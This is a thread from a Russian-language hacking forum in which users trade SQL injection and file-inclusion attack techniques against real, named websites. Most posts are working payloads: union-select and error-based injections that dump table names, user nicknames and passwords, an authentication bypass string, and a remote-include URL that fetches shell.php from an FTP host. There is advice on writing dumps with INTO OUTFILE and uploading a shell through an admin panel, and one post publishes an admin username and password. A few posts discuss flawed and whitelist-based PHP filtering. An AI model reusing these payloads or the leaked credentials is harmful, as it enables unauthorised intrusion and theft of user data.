php?id=1+union+select+1,2,3,4,5+--+
нормально
php?id=1+union+select+1,2,3,4,5+From+--+
уже не обрабатывается,
какие идейки по поводу фильтрации from-а, пробовал отправлять постом, не сработало, регистрами баловался тоже нулевой эффект

<?
if ($page=="") {
$page="any.php";
include($page);
}else{
str_repalce('.', '', $page);
str_repalce('\', '', $page);
if(file_exists($page)){
include($page);
}
}
?>

самый простой способ.
Ну или как выше описали, при помощи switch-ей

Угу, этот способ просто класс :)
file.php?page=ftp://vasa:qwerty@ftp.narod.ru/shell.php

PS Я так полагаю в str_replace ты просто опечатался, как и в '\', а то вообще работать не будет.

Угу, этот способ просто класс :)
file.php?page=ftp://vasa:qwerty@ftp.narod.ru/shell.php

PS Я так полагаю в str_replace ты просто опечатался, как и в '\', а то вообще работать не будет.


почему? точка вырезается же, с ftp не проканает.

А "\" вырезается, чтобы не передать в хексе путь

\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64 = /etc/passwd


Про опечатку - действительно два слеша надо, т.к. экранирование.


<?
if ($page=="") {
$page="any.php";
include($page);
}else{
str_replace('.', '', $page);
str_replace('/', '', $page); // прямые тоже вырезать
str_replace('\\', '', $page);
if(file_exists($page)){
include($page);
}
}
?>

попугай, ничего твой "фильтр" не вырезает. Проверь сам ;)


if ($page=="") {
$page="any.php";
include($page);
}else{
str_replace('.', '', $page);
str_replace('/', '', $page); // прямые тоже вырезать
str_replace('\\', '', $page);
if(file_exists($page)){
include($page);
}
}

//test.php?page=../xek.txt
//test.php?page=ftp://vasa:qwerty@ftp.narod.ru/shell.php


Проверял бы..

:.']попугай, ничего твой "фильтр" не вырезает. Проверь сам ;)


if ($page=="") {
$page="any.php";
include($page);
}else{
str_replace('.', '', $page);
str_replace('/', '', $page); // прямые тоже вырезать
str_replace('\\', '', $page);
if(file_exists($page)){
include($page);
}
}

//test.php?page=../xek.txt
//test.php?page=ftp://vasa:qwerty@ftp.narod.ru/shell.php


Проверял бы..


$page = $_GET['page'];


добавь


Да, надо переменной присваивать результат str_replace. Написал просто в общем виде алгоритм, над правильностью кода не задумывался поначалу.

Вот так будет полностью в-общем.


<?php
$page = $_GET['page'];

if ($page=="") {
$page="any.php";
include($page);
}else{
$page = str_replace('.', '', $page);
$page = str_replace('/', '', $page);
$page = str_replace(':', '', $page);
$page = str_replace('\\', '', $page);
if(file_exists($page)){
include($page);
}
}
?>


Strilo4ka, да это не идея, это обычная практика.

Есть запрос - ... GROUP BY f.id ORDER BY [сюда можем впихнуть что хотим] LIMIT 0, 15
Можно ли провести sql-inj , и как? :confused:

Есть запрос - ... GROUP BY f.id ORDER BY [сюда можем впихнуть что хотим] LIMIT 0, 15
Можно ли провести sql-inj , и как? :confused:

Инъекция после order by
_http://www.securitylab.ru/contest/212101.php

$page = $_GET['page'];


добавь


Да, надо переменной присваивать результат str_replace. Написал просто в общем виде алгоритм, над правильностью кода не задумывался поначалу.

Вот так будет полностью в-общем.


<?php
$page = $_GET['page'];

if ($page=="") {
$page="any.php";
include($page);
}else{
$page = str_replace('.', '', $page);
$page = str_replace('/', '', $page);
$page = str_replace(':', '', $page);
$page = str_replace('\\', '', $page);
if(file_exists($page)){
include($page);
}
}
?>


Strilo4ka, да это не идея, это обычная практика.
в принципе да помогло инклуда больше нету...
но теперь неоткрываются другие странички
http://www.site.ru/index.php?page=activ.htm
http://www.site.ru/index.php?page=presentations.htm
вопрос как их туда добавить? чет у меня не получилось пока....

в принципе да помогло инклуда больше нету...
но теперь неоткрываются другие странички
http://www.site.ru/index.php?page=activ.htm
http://www.site.ru/index.php?page=presentations.htm
вопрос как их туда добавить? чет у меня не получилось пока....
А зачем делать через зад, если вот дали нормальный вариант:
https://forum.antichat.ru/showpost.php?p=1973181&postcount=12068

Или нужно понаставить фильтров, и думать обойдут их или нет?

А зачем делать через зад, если вот дали нормальный вариант:
https://forum.antichat.ru/showpost.php?p=1973181&postcount=12068

Или нужно понаставить фильтров, и думать обойдут их или нет?
<?
$page = $_GET['page'];
if ($page=="") {

switch($page) {
case 'page1':
include("page1.html");
break;

case 'page2':
include("page2.html");
break;

case 'page3':
include("page3.html");
break;

...

default:
include("home.html");
break;
}
?>
да я так поначалу и пробовал,но!!!

parse error: syntax error, unexpected '.' in /web/clients/index.php

посчитай фигурные скобки, вообще проверь код (надеюсь троеточие догадался удалить)

посчитай фигурные скобки, вообще проверь код (надеюсь троеточие догадался удалить)
да там одна лишняя фигурная:)
но всеравно странички которые написал вместо xxx.htm неоткрываются вместо них просто пустое место....

case 'page1':
include("xxx.htm");
break;

case 'page2':
include("xxxx.htm");
break;

в самое начало скрипта вставь

@ini_set("display_errors","1");

и вообще для кодинга есть другой раздел

и вообще для кодинга есть другой раздел
Полностью согласен. Остальной оффтоп потру.

PS Ну вот видишь, по некоторым вопросам и у нас может быть единство взглядов. :)

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/0,1)a)*'

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/1,1)a)*'

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/2,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/2,1)a)*'

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+


говорит

SQL/DB Error -- [Unknown column 'Email' in 'field list']
удаляю Email потом грит что нету Password и тд.
тоесть не выводит инфо ???!!!
Нельзя ли через floor rand вывести инфо?

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+


говорит

SQL/DB Error -- [Unknown column 'Email' in 'field list']
удаляю Email потом грит что нету Password и тд.
тоесть не выводит инфо ???!!!
Нельзя ли через floor rand вывести инфо?

concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns
Откуда должны быть в information_schema.columns пароли и емайлы?!

ругаемся на юнион + селект !!!

ps 5 ветка

Не удивительно, ведь SQL запросов походу два(или больше) т.к.
http://www.dom-ua.com/index.php?n=i&c=195&o=9408+order+by+52/*
еще что-то выдает, а
http://www.dom-ua.com/index.php?n=i&c=195&o=9408+order+by+53/*
Уже вообще пустой экран

Помогите плииз раскрутить иньекцию
http://relax.oko16.ru/uslugi.php?id=79999+union+select+1,2,3,4,5,6,7,dat abase(),9,10,123,1,1,1,1

Доступа к information cheme нет((
версия мускуля 4.1

Не могу правильно составить запрос с использованием SHOW FULL COLUMNS FROM admin

C ночи уже сижу((((

одно поле
А как можно шелл залить?? Или узнать какие ещё таблицы есть??

а воше надо иметь хакерскую догадку :D

брутить!

Эти данные я все уже знаю давно! Мне нужно узнать какие таблицы есть!

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+


говорит

SQL/DB Error -- [Unknown column 'Email' in 'field list']
удаляю Email потом грит что нету Password и тд.
тоесть не выводит инфо ???!!!
Нельзя ли через floor rand вывести инфо?

Откуда должны быть в information_schema.columns пароли и емайлы?!
ну в information_schema.columns должны быть все имена колонок

по поводу колонок procedure analyse, хотя бока могут быть ис ассоциативныи масивом и тем что одно принтабельное поле или брут
короче хз :)
таблицы - брут... тулзу берем и засыраем логи :)

А как выполнить procedure analyse??

Я нуб пока(((

Вот есть инъекция:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+--+

При таком вводе отображаются ники и пассы юзеров. Хочу спросить это отображаются все юзеры? При вводе LIMIT вообще ничего нет.
И как слить базу этих пользователей?

ну в information_schema.columns должны быть все имена колонок
Ну они там и есть,делается вот так:
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
Дальше через лимит.Можно не перебирать а сделать вот так:
select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/and/**/column_name/**/LIKE/**/'%pass%'
SQL/DB Error -- [Duplicate entry 'Password1' for key 1]

есть скуля. хочу вытянуть пароли от форума, но имя бд где лежат пассы содержит -. когда делаю запрос from db-forum.forum_user,то выдает синтаксическую ошибку( можно всё таки как-то вытащить пассы?

UPD: решил, `db-forum`.forum_user

http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+into+outfile+%271.txt%27+--+

Что не так? Выдает ошибку. Надо все записать в файл.

http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+into+outfile+%271.txt%27+--+

Что не так? Выдает ошибку. Надо все записать в файл.
нет прав или не туда льешь.

нет прав или не туда льешь.
Что можно сделать в таком случае?

Что можно сделать в таком случае?
вытаскивать пас админа зайти под его учеткой и пробовать лить шел через админку...

http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+into+outfile+%271.txt%27+--+

Что не так? Выдает ошибку. Надо все записать в файл.
При INTO OUTFILE надо использовать полный путь.

Подскажите как сделать чтобы отобразились названия сразу всех таблиц?

Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+

Но как-то не найс через лимит по одной смотреть.

Подскажите как сделать чтобы отобразились названия сразу всех таблиц?

Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+

Но как-то не найс через лимит по одной смотреть.
скриптом каким нить сдампи структуру.

скриптом каким нить сдампи структуру.
Как это сделать?

Как это сделать?
SIPT/Toolza

Ну они там и есть,делается вот так:
Ну они там и есть,делается вот так:
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+

Дальше через лимит.Можно не перебирать а сделать вот так:
select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/and/**/column_name/**/LIKE/**/'%pass%'
SQL/DB Error -- [Duplicate entry 'Password1' for key 1]
ну эт для вывода имена колонок, а я не могу вывести то что на этих колонках, тоесть тот пасс с колонки Password
так в принцыпе должно было выводит нужное инфо
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/Password/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_tame='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+

Подскажите как сделать чтобы отобразились названия сразу всех таблиц?

Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+

Но как-то не найс через лимит по одной смотреть.
так можеш выводит имена всех таблиц за раз

http://www.f1-world.ru/news/news.php3?idnews=-1003090020.0%20UNION%20ALL%20SELECT%201,(select%20 concat(0x3078,Hex(cast(group_concat(table_name)%20 as%20char)))%20FROM%20information_schema.tables%20 Where%20table_schema=0x6631776F726C64),3,4,5,6,7,8 ,9,10,11,12--

а так для вывода всех колонок с таблицы users за 1 запрос

http://www.f1-world.ru/news/news.php3?idnews=-1003090020.0%20UNION%20ALL%20SELECT%201,(select%20 concat(0x3078,Hex(cast(group_concat(column_name)%2 0as%20char)))%20FROM%20information_schema.columns% 20Where%20table_schema=0x6631776F726C64%20AND%20ta ble_name=0x7573657273),3,4,5,6,7,8,9,10,11,12--

а кстати вот и админ adminn:mikahakka

Есть слепая инъекция
SQL запрос:
SELECT o.id_object FROM attributes a LEFT JOIN pro_ado_objects o ON a.id=o.id_attr WHERE a.control_type IN ('text', 'textarea') AND o.value LIKE '%%' +and+ascii(substring((SELECT login from user),1,1))>1#A%' GROUP BY o.id_object
Выдает ошибку Subquery returns more than 1 row

Есть какие то ещё варианты получить данные из таблицы?
Вывод ошибок отключен!

Вывод ошибок отключен!
Выдает ошибку Subquery returns more than 1 row
мда)

мда)
А что мда? Ошибка такая. Но вывод ошибок отключен.

А что мда? Ошибка такая. Но вывод ошибок отключен.

Ссылку дай и не тупи))) Subquery returns more than 1 row - это и есть вывод ошибки

Есть слепая инъекция
SQL запрос:
SELECT o.id_object FROM attributes a LEFT JOIN pro_ado_objects o ON a.id=o.id_attr WHERE a.control_type IN ('text', 'textarea') AND o.value LIKE '%%' +and+ascii(substring((SELECT login from user),1,1))>1#A%' GROUP BY o.id_object
Выдает ошибку Subquery returns more than 1 row

Есть какие то ещё варианты получить данные из таблицы?
Вывод ошибок отключен!
если ссылку не в студию что тут гадать бум чтол что там

Ссылку дай и не тупи))) Subquery returns more than 1 row - это и есть вывод ошибки
Ошибка появляется когда через MySQL-Front этот запрос делаю, а в скрипте то тупо белый экран и все

Имеется такой код:

$filetype = $_FILES['imagen']['type'];
$name = $_FILES['imagen']['name'];
$extension = get_extension($name);
$imagen = $id.".".$extension;

if (!((strpos($filetype, "gif") || strpos($filetype, "jpeg") || strpos($filetype, "bmp"))))
{
$message = "Error";
}
Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так?

Имеется такой код:

$filetype = $_FILES['imagen']['type'];
$name = $_FILES['imagen']['name'];
$extension = get_extension($name);
$imagen = $id.".".$extension;

if (!((strpos($filetype, "gif") || strpos($filetype, "jpeg") || strpos($filetype, "bmp"))))
{
$message = "Error";
}
Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так?

можно, только там дописывается расширение gif, jpg или bmp. Только прозреваю, что двойное расширение и нульбайт не пройдет, ибо $id наверняка задается как цифра (будет файл вида 32.gif или 45.jpg, 65.bmp).


Это случайно не голландский сайт?

И снова я :(
Вот все же не могу разобраться. Вот что ввожу:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8, 9%20,10,11,12+from+information_schema.columns+wher e+table_name=%27COLUMN_PRIVILEGES%27+LIMIT+1,1+--+
По идее должны выводится столбцы таблицы COLUMN_PRIVILEGES. Но у меня просто ошибка :( Что не так делаю?

И снова я :(
Вот все же не могу разобраться. Вот что ввожу:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8, 9%20,10,11,12+from+information_schema.columns+wher e+table_name=%27COLUMN_PRIVILEGES%27+LIMIT+1,1+--+
По идее должны выводится столбцы таблицы COLUMN_PRIVILEGES. Но у меня просто ошибка :( Что не так делаю?
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8, 9,10,11,12+from+information_schema.columns+where+t able_name=0x434f4c554d4e5f50524956494c45474553+LIM IT+1,1+--+

Хексить религия не позваляет?

можно, только там дописывается расширение gif, jpg или bmp.
Код еще раз глянь, расширение берется то, которое пришло: $imagen = $id.".".$extension; //imagename
Только прозреваю, что двойное расширение и нульбайт не пройдет, ибо $id наверняка задается как цифра (будет файл вида 32.gif или 45.jpg, 65.bmp).
Ну да, это я еще с начала попробовал.
Это случайно не голландский сайт?
Лол, нет.

Хексить религия не позваляет?
Ну с этим понятно, но почему при таком вводе опять ошибка?
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,column_name,3,4,5,6,7,8, %209,10,11,12+from+information_schema.columns+wher e+table_name=hex%28%27fusers%27%29+limit+1,1+--+
Или как нужно "хексить" ?

Ну с этим понятно, но почему при таком вводе опять ошибка?

Или как нужно "хексить" ?


Мдаа, а ты задумывался над тем, что ты написал?)

http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,column_name,3,4,5,6,7,8, 9,10,11,12+from+information_schema.columns+where+t able_name=0x7573657273+limit+1,1+--+

Ну с этим понятно, но почему при таком вводе опять ошибка?

Или как нужно "хексить" ?
http://ctacok.ru/he.php?c=text2hex

0+or+(select+count(*)+from+information_schema.tabl es+group+by+concat(version(),floor(rand (0)*2)))

как работаит ета sql injection?

G1G, значит прав не хватает, а на FreeBSD 7.2 ты их вряд ли поднимешь.

Есть запрос - "SELECT ... FROM ... WHERE ... AND ... AND ... LIKE '%[SQL]%'"
Что сделать можно? :confused:

Есть запрос - "SELECT ... FROM ... WHERE ... AND ... AND ... LIKE '%[SQL]%'"
Что сделать можно?
Выложи полностью адрес и запрос.

0+or+(select+count(*)+from+information_schema.tabl es+group+by+concat(version(),floor(rand (0)*2)))

как работаит ета sql injection?
Это вывод в ошибке

Есть запрос - "SELECT ... FROM ... WHERE ... AND ... AND ... LIKE '%[SQL]%'"
Что сделать можно? :confused:

<?PHP
$db_host = 'localhost';
$db_user = 'root';
$db_pass = '';
$db_name = 'job';
$con = mysql_connect($db_host,$db_user,$db_pass) or die(mysql_error());
mysql_selectdb($db_name,$con) or die(mysql_error());

$q = mysql_query("SELECT id,login,password FROM users WHERE id=1 AND login='ctacok' LIKE '%{$_GET['id']}%'") or die(mysql_error());
$row = mysql_fetch_assoc($q);
echo $row['id'];
echo $row['login'];
echo $row['password'];
?>


?id=1%'+AND+id=user()+union+select+user(),2,3+--+
Просто в чём соль, надо знать имя колонки.

Это вывод в ошибке



<?PHP
$db_host = 'localhost';
$db_user = 'root';
$db_pass = '';
$db_name = 'job';
$con = mysql_connect($db_host,$db_user,$db_pass) or die(mysql_error());
mysql_selectdb($db_name,$con) or die(mysql_error());

$q = mysql_query("SELECT id,login,password FROM users WHERE id=1 AND login='ctacok' LIKE '%{$_GET['id']}%'") or die(mysql_error());
$row = mysql_fetch_assoc($q);
echo $row['id'];
echo $row['login'];
echo $row['password'];
?>



Просто в чём соль, надо знать имя колонки.
Понял,спс.

Этот хацкер (https://forum.antichat.ru/member.php?u=84758) пытается мне доказать,что при allow_url_include off возможно подключить УДАЛЕННЫЙ файл при RFI. Так вот,возможно ли вобще такое? на 99.9% уверен что нет

:.']Этот хацкер (https://forum.antichat.ru/member.php?u=84758) пытается мне доказать,что при allow_url_include off возможно подключить УДАЛЕННЫЙ файл при RFI. Так вот,возможно ли вобще такое? на 99.9% уверен что нет
при allow_url_include off вообще не может быть речи об RFI

:.']Этот хацкер (https://forum.antichat.ru/member.php?u=84758) пытается мне доказать,что при allow_url_include off возможно подключить УДАЛЕННЫЙ файл при RFI. Так вот,возможно ли вобще такое? на 99.9% уверен что нет

Ты, видимо, тоже крутой хацкер и не понимаешь, что при таких условиях RFI не может быть, только LFI.

Ты, видимо, тоже крутой хацкер и не понимаешь, что при таких условиях RFI не может быть, только LFI.

Я понимаю, имел ввиду код. RFI при allow_url_include on -


include($_GET['p']);


например.
Он сказал что знает как провесты тут RFI при allow_url_include off

P.S немного неправельно выразился

при allow_url_include off вообще не может быть речи об RFI


Откуда такая категоричность? Всё зависит от версии, на каких-то версиях можно легко заинклудить удалённый файл при allow_url_include=Off.
Универсального PoC у меня нет.

Откуда такая категоричность? Всё зависит от версии, на каких-то версиях можно легко заинклудить удалённый файл при allow_url_include=Off.
Универсального PoC у меня нет.
От версии чего это зависит?
И пример желательно

PS Только не тот который в РОА, пожалуйста, а что-нибудь своё

От версии чего это зависит?
И пример желательно


От версии php. Можем проверить вместе - нужен сервак с ?< версией php <5.2.1.
Вот смотри: http://bugs.php.net/bug.php?id=35618

[2006-12-12 20:58 UTC] judas dot iscariote at gmail dot com
Make sure to clearly mention that in 5.2.1 it affects php://input among other wrappers. ;)

Стало быть, до этой версии инклуд php://input не запрещён => имеем обход ограничений.

Угу, сейчас потестил на 5.2.0-8+etch16, работает и php://input и data

Это конечно не RFI, который я имел ввиду, но всё равно интересно

Вот, я кажется откопал место в исходниках php, где это видно.
Вот участок в memory.c в 5.2.0:

708 php_stream_wrapper php_stream_rfc2397_wrapper = {
709 &php_stream_rfc2397_wops,
710 NULL,
711 0, /* is_url */
712 };
А вот тот же участок в 5.2.1:
745 php_stream_wrapper php_stream_rfc2397_wrapper = {
746 &php_stream_rfc2397_wops,
747 NULL,
748 1, /* is_url */
749 };

А теперь смотрим в исходник streams.c (там нижеследующий код одинаков вроде бы во всех версиях):

1605 if ((wrapperpp && (*wrapperpp)->is_url) && (!PG(allow_url_fopen) || ((options & STREAM_OPEN_FOR_INCLUDE) && !PG(allow_url_include))) ) {
1606 if (options & REPORT_ERRORS) {
1607 php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL file-access is disabled in the server configuration");
1608 }
1609 return NULL;
1610 }

Вот как-то так. Значит в версиях до 5.2.1 RFI будет и с allow_url_include=Off, если использовать php-streams типа php://input. Для data: видимо тоже есть где-то такое определение (насчёт того, is_url он или нет).
Нижнюю границу версий точно не знаю...

Вот как-то так. Значит в версиях до 5.2.1 RFI будет и с allow_url_include=Off.
RFI там не будет. Только обёртки отработают

Ну ок ок, не RFI, а CE - нам от этого нисколько не хуже.)
Хотя вопрос был принципиальный - возможна ли эксплуатация RFI в таких условиях. Видимо ответ конкретно на этот вопрос - всё-таки нет...

а если при инекции есть такоы ошибка

+union+select+0 i vot osibka..
Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

и зделал /*!sql*/ (WАF) НЕ помоq..

Всем доброго времени суток!
Помогите если не сложно.
Ломаю сайт не зная как :D
Нашёл на сайте форму для входа админа, в ней есть баг.

Вот форма :
http://s57.radikal.ru/i158/1003/d0/7e36b8558928t.jpg (http://radikal.ru/F/s57.radikal.ru/i158/1003/d0/7e36b8558928.jpg.html)

В поле e-mail ввожу ковычку вылетает такая ошибка:
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND PASSWORD =''' at line 1 SELECT * FROM admin_users WHERE USERNAME=''' AND PASSWORD =''


В поле E-mail пишу следующее:
'union+select+from+admin_users+limit+19,1%23


Вылетает это:
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+select+from+admin_users+limit+19,1%23' AND PASSWORD =''' at line 1 SELECT * FROM admin_users WHERE USERNAME=''union+select+from+admin_users+limit+19, 1%23' AND PASSWORD =''

В чём моя ошибка? Сильно не пинайте если натупил =)

Я только учусь)

и если не сложно дайте код правильного запроса.

Заранее спасибо ! =)

В поле email вбей, admin' or '1'='1' --

Выдаёт вот такую ошибку

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND PASSWORD =''' at line 1 SELECT * FROM admin_users WHERE USERNAME='admin' or '1'='1' --' AND PASSWORD =''


Всё получилось ))) Спасибо лови от меня +

Вот как надо было admin' or '1'='1' -- and password

И можно описание данного кода?

именно вот этого куска: admin' or '1'='1' --

Ладно в админку то я попал.. но это было не особо гланым...

Как вытащить пароль из базы?
Заранее спасибо)